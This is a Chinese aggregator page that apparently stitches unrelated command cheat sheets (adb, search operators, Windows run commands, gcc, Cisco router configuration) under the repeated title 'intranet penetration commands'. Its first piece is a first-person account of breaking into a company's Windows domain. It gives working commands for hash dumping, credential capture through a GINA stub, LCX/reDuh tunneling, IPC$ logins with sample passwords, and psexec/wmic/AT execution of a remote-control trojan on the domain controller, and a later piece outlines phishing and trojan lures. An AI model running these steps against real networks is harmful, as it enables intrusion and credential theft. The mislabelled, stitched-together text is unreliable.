内网渗透常用命令

2024-06-08

内网渗透常用命令(共9篇)

内网渗透常用命令 篇1

1.收集信息。

1-1.无论是什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。

既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。

1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,密码这些重要数据,以后有一定的用,所以,在你渗之前,不妨建个记事本将重要信息保存起来,写个记事本不会浪费你多少时间。接下来,我们就应该对这个网络进行一定的了解,他是一般的内网,还是域?一般大公司都会用域的,我们只需要查一下就知道,要想对他进行渗透,你就必须了解他的网络拓补,当然,一些太具体的物理上我们是无法了解的,我们只能了解我们所能知道的。不管他是INT,DMZ,LAN,我们必须足够掌握。在这,我们就会用到一定的命令,相信大家应该都很熟悉。

ipconfig /all 查询一下本机的一些情况,IP段 网关 属于不属于域

net view 查询一些存在联系的机器,一般以机器名显示,我们需要对其PING出IP,一是方便查询哪些重要机器的IP,二是方便查询存在几个段

net view /domain 查询有几个域 因为大型网络里面一般不止一个域的 net group /domain 查询域里面的组 net user /domain 查询域用户

net group “domain admins” /domain 查询域管理用户组

这些都是我们需要了解的,当然有时候还会需要再查询一些信息,NET命令下你们都会找到,不需要我再重复,具体的情况具体分析问题。

2.信息归档

2-1。有了信息,我们就要对信息进行一定的归档,将每个机器名所对应的IP归档,方便用时不会乱。2-2。查询出的用户,管理员,我们也必须归档。

2-3。查询信息时可能出现的有利用价值信息必须归档。3.技术利用

3-1。不论是通过键盘记录。或者HASH的抓取,我们需要将账号,密码,邮箱,凡是涉及关键数据的全部保存,一方面是准备渗透的资料,二是防止当前利用机器会掉。3-1-1。利用远控的键盘记录进行抓取。

3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记录密码。

3-2。有了内网,很多东西我们是没有必要直接在当前利用机器上操作的,别人虽然是内网,但是不代表他没有防御系统,所以,我们建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都会了吧。

3-2-1。我在这推荐 VIDC 这个工具,很方便,在CMD下直接操 VIDC.EXE-D-P PORT 就可以了。

3-2-2。在利用机器上使用LCX,CMD下 LCX.EXE-SLAVE 服务器IP PORT 127.0.0.1 PORT,然后到服务器上 CMD下 LCX.EXE-LISTEN 服务器IP PORT 任意PORT。

3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接,成功连接后该操作什么就看你们自己了。

基本上我们就只能操作这么多了,后面已经没有什么技术上的再使用或利用,但是这中间的经验不少,所需要处理的细节也不少。

我们在得到内网机器后,如果他存在域,但是没有使用域账号怎么办?那我们只能查询或者想尽一切手段获得他常用的账号密码,然后利用这个账号密码,再通过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件,还有记录密码,GINA,HASH破解,这些都是必须的。

进入域后,我们又该怎么做,建立SOCKS后又该怎么做。我们可以扔S上去查看主要的端口,我们可以对端口进行弱口令的尝试,我们可以针对内网的WEB进行检测,方式很多,甚至你可以用MS08-067对另一台机器进行突破,但是相信我,能使用域的机器,大部分都是补丁打齐的。我们能利用的很少,但是不能灰心,只要能在内网穿梭,我们至少在防御上会轻松很多,我们需要的只是耐心和时间。

一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,这就得看你们的权限有多大。net use IPipc$ password /user:username@domain 推荐使用这样的方式输入账号和密码,为什么?如果用户名存在空格,你这样输会保险些。什么 域用户不能存在空格? 是的,以前我也认为不会,微软的讲师也说不会,不过,经过我的测试和经验,那是假的,域 完全可以空格,除了 user name 这样的,还可以存在 user na me,不信 你可以试试。

建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。

后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,几次都是不知如何进行,其实在技术上,并没有什么障碍。主要是在于对方有着比较强的主防御,而我的远控最开始连CMD都无法执行,后经过几天的环境测试,突破了CMD。有了CMD后,进行了查询,获得了一些信息,就开始了往下的渗透,被控机器的密码我不是跑出来的,我是翻他的文件翻出他常用密码的。因为他没有使用域账号,都是以系统账号登陆,所以无法查看域。我只能用他的域账号建立IPC连接,查找到内网的一个WEB服务,将其渗透后才算拿下了一个稳定的内网机器。

拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,PW后得到了HASH,破解掉我就连向了域控服务器的IPC$。

连接了IPC$,直接在其SYSYTEM32下扔了一个远控,然后用AT命令将其启动,这期间我尝试了5个SHIFT,但是SHIFT关闭后,我的远控也会掉,所以排除了这种方法,还是用AT来ADD NEW JOB 比较方便。

给域控服务器种了远控,利用CMD来GETHASHES了全部的HASHES进行破解,很幸运的查到了文件管理组的用户,这才有了我后面的目标达成。

总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,不过也花了半个月的时间,时间大部分花在测试防御环境,软件免杀,木马免杀,查找资料这些上面。

后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。

已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。常用命令

net view 查看同一域/工作组的计算机列表

net view /domain 查看域/工作组列表

net view /domain:Secwing 查看Secwing域中 计算机列表

net group /domain 查看所在域的组

net user /domain 查看所在域用户

net user /domain zerosoul 12345678 修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限

net localgroup administrators SECWINGzerosoul /add 域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行

下面的命令 只能用于 域控制器:

net group “Domain controllers” 查看域控制器(如果有多台)

net group 查看域的组

net group “domain admins” 查看域管理员

net group “domain users” 查看域管理员

PS:打开配置域控制器向导的命令 dcpromo

psexec /accepteula 绕过第一次验证窗口 mstsc/admin 解决hash无法抓出问题

wmic /node:172.16.19.96 /user:ABIMAQAdministrator /password:k78m90 process call create c:kav2009.exe psexec.exe-s-u administrator-p k78m90 172.16.16.2-c c:kav2009.exe 拷贝文件并且执行 psexec.exe-s-u administrator-p km3h7i 172.16.16.2-c c:kavgsecdump.exe-u 抓取hash net use 172.16.16.2IPC$ “k78m90” /user:“admintitrator” net use 172.16.16.2IPC$ “k78m90” /user:“aABIMAQAdministrator” net time 172.16.16.2 at 172.16.16.2 13:50 2009.exe

java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令 [createTunnel]1234:127.0.0.1:3389 端口转向命令

iam-alt-h user-hash 这样hash就被注入了 whosthere-alt.exe 来查看是否被注入成功。

adb常用命令总结 篇2

ADB ADB = Android Debug Bridge

顾名思义,这个是PC机与Android设备的连接桥。简单的说,就是通过adb ,PC可以控制与之相连的Android设备。

1,android手机连上PC,或者虚拟机启动之后,一般PC都会检测到设备并且自动连接上。我们用以下命令可以查看当前连接的设备列表:

>>adb devices

2,android是个Linux系统。我们可以通过adb启动一个Linux终端,执行Android上的Linux命令。通过以下操作:

>>adb shell 执行之后,进入android终端,输入的命令都是在手机上执行的。例如我们输入ls,(此命令后面可以跟具体的路径)看到的文件和目录都是手机里的。

通过操作CTRL+D 或exit 就可以退出shell远程连接

3,重启手机。有时候手机被锁屏了,或者被无限的弹出窗口占用了屏幕,无法重启了,可以利用adb来重启手机。

>>adb reboot 重启到Recovery界面

>>adb reboot recovery

重启到bootloader界面

>>adb reboot bootloader

4,有时候,手机连接PC会出现问题,用adb devices查看到的是一串问号。这个时候,可以尝试:

>>adb kill-server

输入这个命令之后,立即(经验,10秒以内)输入:

>>adb devices 或者输入 >>adb start-server 这样,手机会重新连接PC。

5,拷贝文件到手机里

>>adb push [PC文件路径] [手机的目录]

因为每次只能拷贝一个文件到手机上,如果需要批量拷贝,可以自己写一个shell。

6,从手机上拷贝文件到PC里(必须有root权限)>>adb pull [手机文件路径] [PC的目录]

每次只能拷贝一个文件

7,安装apk到手机上。>>adb install [PC上的APK路径]

Android手机有个设置,可以设置是否允许安装非签名的应用程序。但是用adb install方式,可以绕开这个设置。也就是说,不论手机是否允许安装非签名的应用程序,用adb install总能把apk安装到手机上。

重新安装该软件

adb install-r apk文件名称.apk

与之相对应的卸载,还有

>>adb uninstall [应用程序包名]

8,有时候,连接会变的不稳定。这个时候,需要重新挂载一下手机。用以下命令:

>>adb remount

9,查看Log

>>adb logcat

10、如果adb没有权限就

adb kill-server adb start-server

搜索引擎常用搜索命令 篇3

搜索引擎是搜集互联网上的信息,汇总整理后,为大家提供方便的信息查询系统,如今搜索引擎以成千万网民上网必用的工具之一,方便了广大生活、学习、娱乐,怎么能更好的使用搜索引擎,下面Seoer惜缘列出了部分搜索引擎查询命令,让我们更好的使用搜索引擎:

intitle命令:

intitle的含义在于搜索网页标题中含有的关键词,例如想搜索标题中含有“it”的内容,就搜索intitle:it ,就会搜索到网页标题中含有it关键词的网页.

“”命令:

“”的含义在于搜索含有关键词内的网页(网站推广www.51hlht.com),例如想搜索标题中含有“baidu”的内容,就搜索“baidu” ,就会搜索到网页中含有关键词baidu的网页.

搜索号码命令

例如想在搜索引擎输入手机号、ip地址、都能查询到手机号的注册地址,ip所在的地址,

site命令:

site的含义在于检索查看设定的网站在搜索引擎中收录抓取内容的数量,例如搜索“site:www.noseo.org.cn“就能查询到搜索引擎收录noseo多少页内容。

+命令与domain命令

+命令与domain命令的含义在于检索网站在搜索引擎中反面链接页面,例如想搜索有什么网页链接到www.51hlht.com的页面,就可以输入domain:www.51hlht.com或者+ www.51hlht.com

mp3命令

mp3命令在查询音乐的下载试听地址,如想搜索歌曲“我和你”的下载试听地址,就可可以输入“mp3:我和你”查询,

inurl命令

inurl命令在于查询网址中含有的关键词,如搜索网址中含有关键词“baidu”的词语,就可以输入“inurl:baidu”查询。

其它铺助搜索命令:

利用-来限定关键词一定不要出现在结果中。 例如:键入seo-网站,会找出包含seo但除了网站的网站。

利用*代替所有的字母,模糊检索那关键词或者是不能确定的关键词。 例如:键入“爱*”后的会查询到包含爱字的相关内容。

利用可以把多个关键词划分为一组,并进行优先查询。 例如:键入“(seo+网络)”来搜索包含“seo”与“网络”的信息.

利用and 表示前后两个关键词是“与”的逻辑关系。 例如输入关键词:聊城 and 江北水城 会找出将包含聊城和江北水城有关的网站。

利用or(|)表示前后两个词是“或”的逻辑关系。 例如输入关键词:聊城 or 出口,会找出将包含聊城 或者出口 的网页。

以上信息在最实用的百度搜索引擎中均可使用。

百度查询页关于网址中代码的含义:

如搜索关键词“知识”第二页,网址如下:www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=%D6%AA%CA%B6&pn=10&ver=0&cl=3

其中:

wd代表查询关键词

cl=3代表网页搜索

ie=gb2312代表查询输入关键词的编码

tn代表

pn代表显示搜索结果的页数

rn代表页面显示搜索结果的数量

Win 7常用运行命令总结 篇4

Windows7作为微软新操作系统,有哪些运行命令呢?

1、wiaacmgr: 扫描仪和照相机向导

2、psr:问题步骤记录器

3、PowerShell:提供强大远程处理能力

4、colorcpl:颜色管理,配置显示器和打印机等中的色彩。

5、credwiz:备份或还原储存的用户名和密码

6、eventvwr:事件查看器管理单元(MMC) ,主要用于查看系统日志等信息。

7、wuapp:Windows更新管理器,建议设置为更新提醒模式

8、wf.msc:高级安全Windows防火墙

9、soundrecorder:录音机,没有录音时间的限制

10、snippingtool:截图工具,支持无规则截图

11、slui:Windows激活,查看系统激活信息

12、sdclt:备份状态与配置,就是查看系统是否已备份

13、Netplwiz:高级用户帐户控制面板,设置登陆安全相关的选项

14、msdt:微软支持诊断工具

15、lpksetup:语言包安装/删除向导,安装向导会提示下载语言包

16、cleanmgr: 打开磁盘清理工具

17、compmgmt.msc: 计算机管理

18、eudcedit: 造字程序

19、fsmgmt.msc: 共享文件夹管理器

20、gpedit.msc: 组策略

21、iexpress: 工具,系统自带

22、logoff: 注销命令

23、lusrmgr.msc: 本机用户和组

24、MdSched:来启动Windows内存诊断程序

25、mstsc: 远程桌面连接

26、Msconfig.exe: 系统配置实用程序

27、mplayer2: 简易widnows media player

28、mspaint: 画图板

29、magnify: 放大镜实用程序

30、mmc: 打开控制台

31、mobsync: 同步命令

32、notepad: 打开记事本

33、nslookup: 网络管理的工具向导

34、narrator: 屏幕“讲述人”

35、netstat : an(TC)命令检查接口

36、OptionalFeatures:打开“打开或关闭Windows功能”对话框

37、osk: 打开屏幕键盘

38、perfmon.msc: 计算机性能监测程序

39、regedt32: 注册表编辑器

40、rsop.msc: 组策略结果集

41、regedit.exe: 注册表

42、services.msc: 本地服务设置

43、sysedit: 系统配置编辑器

44、sigverif: 文件签名验证程序

45、shrpubw: 创建共享文件夹

46、secpol.msc: 本地安全策略

47、syskey: 系统加密

48、Sndvol: 音量控制程序

49、sfc.exe: 系统文件检查器

50、sfc /scannow: windows文件保护(扫描错误并复原)

51、taskmgr: 任务管理器

52、utilman: 辅助工具管理器

53、winver: 检查Windows版本

54、wmimgmt.msc: 打开windows管理体系结构(WMI)

55、Wscript.exe: windows脚本宿主设置

56、write: 写字板

57、conf: 启动系统配置实用程序

58、charmap: 启动字符映射表

59、calc: 启动计算器

60、chkdsk.exe: Chkdsk磁盘检查

61、cmd.exe: CMD命令提示符

62、certmgr.msc: 证书管理实用程序

63、Clipbrd: 剪贴板查看器

64、dvdplay: DVD播放器

65、diskmgmt.msc: 磁盘管理实用程序

66、dfrg.msc: 磁盘碎片整理程序

67、devmgmt.msc: 设备管理器

68、dxdiag: 检查DirectX信息

69、dcomcnfg: 打开系统组件服务

70、explorer: 打开资源管理器

浅析企业内网渗透 篇5

一个企业,可以是不同行业,他们所包含的机密数据,隐蔽数据,功能控制,和对整个旗下的可信任域都是极为重要的安全方向。

对于初具规模的企业来说,内部沟通需要邮件,即时沟通需要im软件,需要有域控,需要有核心交换机,有几个指定内外网交换出口,或连通IDC的内网通道,这些,对于互联网企业来说都是必不可少的,但是完善的同时也存在着一些安全隐患。

0×01邮件与IM安全

或 许邮件地址的方法简单,通俗一些,可以看招聘所留下的邮箱,可以看网站上的联系我们等等。而利用邮件作为入手点,也是大部分想渗透到企业内网的 hacker们的必备工具之一。邮件中,可以包含可执行文件,可以放木马,可以放挂马链接,也可以做钓鱼。总之第一步就是诱惑其种马。%关注,企业内网安全,第一处,邮件安全%

其次,获得相关企业的im软件,沟通内部人员,以获得信任,同样可以发送一些木马之类的,这一步主要是诱导。

%关注,企业内网安全,第二处,即时通讯%

以上这两种方法可以不费吹灰之力,只要马做的好,信息写的诱惑一些,就可以搞定内网的某些机器。

0×02 办公网安全

当获得内网机的权限后,便可以用其来做跳板,代理,或直接命令操控都可以。%关注,内网办公平台办公网安全%

办公网的机器,一般都是由域来控制的,而获得了域控管理员的账号密码,那便是获得了内网所有加入域的机器的权限,而在没获得域控的前提下,可以看看内网的共享,内网的弱口令,内网的一些测试服务器(这种服务器一般都是无密码或账号密码一样或者是弱口令)

如果是以太网,可以进行内网的一些账号密码嗅探,但是如果有IPS等设备,很容易被监控到,

另外在,办公网的机器上,会存有一些常用服务器的账号密码,如果是明文那么就很容易得到相应的信息及权限%关注,服务器密码及机密数据的保存%,得到这些,对整个内网及IDC的渗透便会更近一步。

如果,弄到了核心交换机的账号密码,那么便是掌握了整个内网的命脉,如果是恶意行为,一个病毒便可以弄瘫全网。

0×03web安全

除 此之外,可以有另一种思路,便是我们经常所讨论的,web安全,因为web应用所在的IDC一般会有内网专用的运维通道,如果没有,也可以从运维的来源 ip找到企业的出口ip,如开放了某些协议,对其DDOS,影响也会很大。Web的渗透这块就不用说了,各种方法,提权,其实在去渗透C段的时候,可以观 察其登陆的来源IP,可能有意向不到的结果。%关注,web安全%

0×04 子公司间的策略控制

有些公司的总公司安全做的很好,但是他们疏忽了子公司,因为总-子会有内网连通,子公司的安全性比较薄弱,容易入侵,这样渗透总公司便更加容易。%关注,与子公司之间的策略及控制%

当 得到了一个企业的一定网络权限,也许就会掌握这个企业的命脉,机密资料,人员信息,网站的控制。举个例子,如金融行业,股票操盘等数据对其极为重要,如泄 露或许会使一大部分人盈利,自己也会损失惨重。传媒行业,可以屏蔽信息,修改舆论,获得内部新闻资料及相关人士的信息。另外,还有游戏行业,搜索引擎,等等。都需要来关注内网的安全。

0×05 总结

其实,对于内网的渗透,要一步一步来,不能着急,不要产生过大的数据量。而对于其安全来说,要完善监控,完善策略,加强管理,得到重视。

企业安全,需要得到重视,如果一旦被攻破,那么将会损失惨重,如果遇到有目的,且恶意的攻击渗透,那么这将会是一场腥风血雨。

内网渗透常用命令 篇6

功能:.gz 后缀,只能压缩文件,不能压缩目录,不保留源文件

vcD4KPHA+w/zB7sP7s8ajunRhcjwvcD4KPHA+uabE3KO6tPKw/DwvcD4KPHA+PGltZyBzcmM9”www.2cto.com/uploadfile/Collfiles/1202/2014192457234.png“ alt=”“>

命令名称:zip、unzip

功能:保留源文件 -r 压缩目录

命令名称:bzip2

内网渗透常用命令 篇7

GCC 是 GNU 的 C 和 C++ 编译器。实际上,GCC 能够编译三种语言:C、C++ 和 O

bject C(C 语言的一种面向对象扩展)。利用 gcc 命令可同时编译并连接 C 和 C++

源程序。

运行 gcc/egcs

**********运行 gcc/egcs***********************

GCC 是 GNU 的 C 和 C++ 编译器。实际上,GCC 能够编译三种语言:C、C++ 和 O

bject C(C 语言的一种面向对象扩展)。利用 gcc 命令可同时编译并连接 C 和 C++

源程序。

如果你有两个或少数几个 C 源文件,也可以方便地利用 GCC 编译、连接并生成可

执行文件。例如,假设你有两个源文件 main.c 和 factorial.c 两个源文件,现在要编

译生成一个计算阶乘的程序。

代码:

-----------------------

清单 factorial.c

-----------------------

int factorial (int n)

{

if (n <= 1)

return 1;

else

return factorial (n - 1) * n;

}

-----------------------

清单 main.c

-----------------------

#include tdio.h>

#include

int factorial (int n);

int main (int argc, char **argv)

{

int n;

if (argc < 2)

{

printf (“Usage: %s nn”, argv [0]);

return -1;

}

else

{

n = atoi (argv[1]);

printf (“Factorial of %d is %d.n”, n, factorial (n));

}

return 0;

}

-----------------------

利用如下的命令可编译生成可执行文件,并执行程序:

$ gcc -o factorial main.c factorial.c

$ ./factorial 5

Factorial of 5 is 120.

GCC 可同时用来编译 C 程序和 C++ 程序,

一般来说,C 编译器通过源文件的后缀

名来判断是 C 程序还是 C++ 程序。在 Linux 中,C 源文件的后缀名为 .c,而 C++ 源

文件的后缀名为 .C 或 .cpp。但是,gcc 命令只能编译 C++ 源文件,而不能自动和 C

++ 程序使用的库连接。因此,通常使用 g++ 命令来完成 C++ 程序的编译和连接,该程

序会自动调用 gcc 实现编译。假设我们有一个如下的 C++ 源文件(hello.C):

#include

void main (void)

{

cout << “Hello, world!” << endl;

}

则可以如下调用 g++ 命令编译、连接并生成可执行文件:

$ g++ -o hello hello.C

$ ./hello

Hello, world!

**********************gcc/egcs 的主要选项*********

gcc 命令的常用选项

选项 解释

-ansi 只支持 ANSI 标准的 C 语法。这一选项将禁止 GNU C 的某些特色,

例如 asm 或 typeof 关键词。

-c 只编译并生成目标文件。

-DMACRO 以字符串“1”定义 MACRO 宏。

-DMACRO=DEFN 以字符串“DEFN”定义 MACRO 宏。

-E 只运行 C 预编译器。

-g 生成调试信息。GNU 调试器可利用该信息。

-IDIRECTORY 指定额外的头文件搜索路径DIRECTORY。

-LDIRECTORY 指定额外的函数库搜索路径DIRECTORY。

-lLIBRARY 连接时搜索指定的函数库LIBRARY。

-m486 针对 486 进行代码优化。

-o FILE 生成指定的输出文件。用在生成可执行文件时。

-O0 不进行优化处理。

-O 或 -O1 优化生成代码。

-O2 进一步优化。

-O3 比 -O2 更进一步优化,包括 inline 函数。

-shared 生成共享目标文件。通常用在建立共享库时。

-static 禁止使用共享连接。

-UMACRO 取消对 MACRO 宏的定义。

-w 不生成任何警告信息。

-Wall 生成所有警告信息。

内网渗透常用命令 篇8

router>

router> enable

router#

router# configure terminal

router(config)#

router(config)# interface Type Port

router(config-if)# no shutdown

router(config-if)# ip address IP-Address Subnet-Mask

router(config-if)# ^z

配置RIP路由协议:30秒更新一次

router(config)# router rip

router(config-if)# network Network-Number <--通告标准A,B,C类网-->

router(config-if)# ^z

配置IGRP路由协议:90秒更新一次

router(config)# router igrp AS-Number <-- AS-Number范围1~65535-->

router(config-if)# network Network-Number <--通告标准A,B,C类网-->

router(config-if)# ^z

配置Novell IPX路由协议:Novell RIP 60秒更新一次

router(config)# ipx routing [node address]

router(config)# ipx maximum-paths Paths <--设置负载平衡,范围1~512-->

router(config)# interface Type Port

router(config-if)# ipx network Network-Number [encapsulation encapsulation-type] [secondary] <--通告标准A,B,C类网-->

router(config-if)# ^z

配置DDR:

router(config)# dialer-list Group-Number protocol Protocol-Type permit [list ACL-Number]

router(config)# interface bri 0

router(config-if)# dialer-group Group-Number

router(config-if)# dialer map Protocol-Type Next-Hop-Address name Hostname Telphone-Number

router(config-if)# ^z

配置ISDN:

router(config)# isdn swith-type Swith-Type <--配置ISDN交换机类型,中国使用basic-net3-->

router(config-if)# ^z

配置Frame. Relay:

router(config-if)# encapsulation frame-relay [cisco | ietf ]

router(config-if)# frame-relay lmi-type [ansi | cisco | q933a ]

router(config-if)# bandwidth kilobits

router(config-if)# frame-relay invers-arp [ Protocol ] [dlci ]

<--配置静态Invers ARP表:

router(config)# frame-relay Protocol Protocol-Address DLCI [ Broadcast ] [ ietf | cisco ] [ payload-compress | packet-by-packet ]

-->

<--设置Keepalive间隔:

router(config-if)# keepalive Number

-->

<--为本地接口指定DLCI:

router(config-if)# frame-lelay local-dlci Number

-->

<--子接口配置:

router(config-if)# interface Type Port.Subininterface-Number [ multipoint | point-to-point ]

router(config-subif)# ip unnumbered Interface

router(config-subif)# frame-lelay local-dlci Number

-->

router(config-if)# ^z

配置标准ACL:

router(config)# access-list Access-List-Number [ permit | deny ] source [ source-mask ] <-- Access-List-Number 范围:1~99标准ACL;100~199扩展ACL;800~899标准IPX ACL;900~999扩展IPX ACL;1000~1099 IPX SAP ACL;600~699Apple Talk ACL-->

router(config)# interface Type Port

router(config-if)# ip access-group Access-List-Number [ in | out ]

router(config-if)# ^z

配置扩展ACL:

router(config)# access-list Access-List-Number [ permit | deny ] [ Protocol | Protocol-Number ] source source-wildcard [ Source-Port ] destination destination-wildcard [ Destination-Port ] [ established ]

router(config)# interface Type Port

router(config-if)# ip access-group Access-List-Number [ in | out ]

router(config-if)# ^z

配置命名ACL:

router(config)# ip access-list [ standard | extended ] ACL-Name

router(config [ std- | ext- ] nacl)# [ permit | deny ] [ IP-Access-List-Test-Conditions ]

router(config [ std- | ext- ] nacl)# no [ permit | deny ] [ IP-Access-List-Test-Conditions ]

router(config [ std- | ext- ] nacl)# ^z

router(config)# interface Type Port

router(config-if)# ip access-group [ACL-Name | 1~199 ] [ in | out ]

router(config-if)# ^z

配置DCE时钟:

router# show controllers Type Port <--确定DCE接口-->

router(confin-if)# clock rate 64000 <--进入DCE接口设置时钟速率-->

router(config-if)# ^z

配置PPP协议:

router(config)# username Name password Set-Password-Here <--验证方建立数据库-->

router(config)# interface Type Port

router(config-if)# encapsulation ppp <--启动PPP协议-->

router(config-if)# ppp outhentication [ chap | chap pap | pap chap | pap ] <--选择PPP认证-->

router(config-if)# ppp pap sent-username Name password Password <--发送验证信息-->

router(config-if)# ^z

PAP单向认证配置实例:

验证方:

router-server(config)# username Client password 12345 <--验证方建立数据库-->

router-server(config)# interface serial 0

router-server(config-if)# encapsulation ppp

router-server(config-if)# ppp authentication pap <--选择使用PAP实现PPP认证-->

router-server(config-if)# ^z

被验证方:

router-client(config-if)# encapsulation ppp

router-client(config-if)# ppp pap sent-username Client password 12345 <--发送验证信息-->

router-client(config-if)# ^z

PAP双向认证配置实例:

路由器 A:

routerA(config)# username B password 12345

routerA(config)# interface serial 0

routerA(config-if)# encapsulation ppp

routerA(config-if)# ppp authentication pap

routerA(config-if)# ppp pap sent-username A password 54321

routerA(config-if)# ^z

路由器 B:

routerB(config)# username A password 54321

routerB(config)# interface serial 1

routerB(config-if)# encapsulation ppp

routerB(config-if)# ppp authentication pap

routerB(config-if)# ppp pap sent-username B password 12345

routerB(config-if)# ^z

CHAP单向认证配置实例:

验证方:

router-server(config)# username router-client password 12345

router-server(config)# interface serial 0

router-server(config-if)# encapsulation ppp

router-server(config-if)# ppp authentication chap

router-server(config-if)# ^z

被验证方:

router-client(config-if)# encapsulation ppp

router-client(config-if)# ppp authentication chap

router-client(config-if)# ppp chap hostname router-client

router-client(config-if)# ppp chap password 12345

router-client(config-if)# ^z

CHAP双向认证配置实例:

路由器 A:

routerA(config)# username routerB password 12345

routerA(config)# interface serial 0

routerA(config-if)# encapsulation ppp

routerA(config-if)# ppp authentication chap

routerA(config-if)# ppp chap hostname routerA

routerA(config-if)# ppp chap password 54321

routerA(config-if)# ^z

路由器 B:

routerB(config)# username routerA password 54321

routerB(config)# interface serial 1

routerB(config-if)# encapsulation ppp

routerB(config-if)# ppp authentication chap

routerB(config-if)# ppp chap hostname routerB

routerB(config-if)# ppp chap password 12345

routerB(config-if)# ^z

Telnet使用:

routerA# terminal monitor <--可以传回在远端主机执行Debug命令的结果-->

routerA# telnet IP-Address [ Router-Name ] <--Telnet到指定的地址或名字的主机-->

routerB# [ exit | logout ] <--退出Telnet-->

routerB# ++<6>再按 <--挂起Telnet-->

routerA# show sessions <--显示当前所有Telnet的信息,包括Connect-Number -->

routerA# Connect-Number <--返回指定的Telnet连接-->

routerA# disconnect IP-Address [ Router-Name ] <--断开指定地址或名字的主机的连接-->

routerA# show user <--显示Telnet到本机的连接信息-->

routerA# clear line [ 0 | 1 | 2 | 3 | 4 ] <--断开指定Telnet到本机的连接-->

禁止任何Telnet到本机:

router(config)# line vty 0 4

router(config-line)# access-class ACL-Number

router(config)# ^z

设置主机名:

router(config)# hostname Set-Hostname

router(config)# ^z

router(config)# ^z

设置用户模式密码:

router(config)# line console 0

router(config-line)# login

router(config-line)# password Set-Password

router(config-line)# ^z

设置Telnet密码:

router(config)# line vty 0 4

router(config-line)# login

router(config-line)# password Set-Password

router(config-line)# ^z

设置特权模式密码:

内网渗透常用命令 篇9

自动化测试基本操作命令:

模拟点击操作:adb shell input tap 500 500(点击手机(500,500)坐标)模拟滑动屏幕操作:adb shell input swipe 200 500 400 500 模拟输入文本信息:adb shell input text helloworld 模拟按键命令:

adb shell input keyeventKEYCODE_VOLNME_DOWN按音量下键 adb shell input keyeventKEYCODE_VOLNME_UP

按音量上键 adb shell input keyevent 自动化测试中日志分析截图命令:

数据线连接手机截图:adb shell /system/bin/screencap–p /sdcard/screenshot.png 将截图复制到电脑盘中:adb pull /sdcard/screenshot.png E:download 输出所有已经安装应用: adb shell pm list package –f 查看预安APK adb shell pm list package-3 安装应用程序:

adb install –r 应用程序.apk 文件传输:

获取模拟器中的文件:adb pull 向模拟器中写文件:adb push 其他命令: 重启手机:adb shell reboot 重启手机进入recovery模式:adb shell reboot recovery 重启手机进入下载模式:adb shell reboot bootloader 对某一模拟器执行命令:adb–s 模拟器编号命令

常用的发送键盘事件:

命令格式:adb shell input keyevent“value” 其中value以及对应的key code如下:

【内网渗透常用命令】推荐阅读:

常用计算机管理命令08-13

渗透发展07-20

深度渗透10-14

渗透路径10-16

科学渗透10-18

文化渗透10-19

一个渗透05-25

渗透函数05-29

渗透特征05-31

渗透策略06-06

上一篇:烧鸡翅的香味学生叙事作文下一篇:两新组织党建工作报告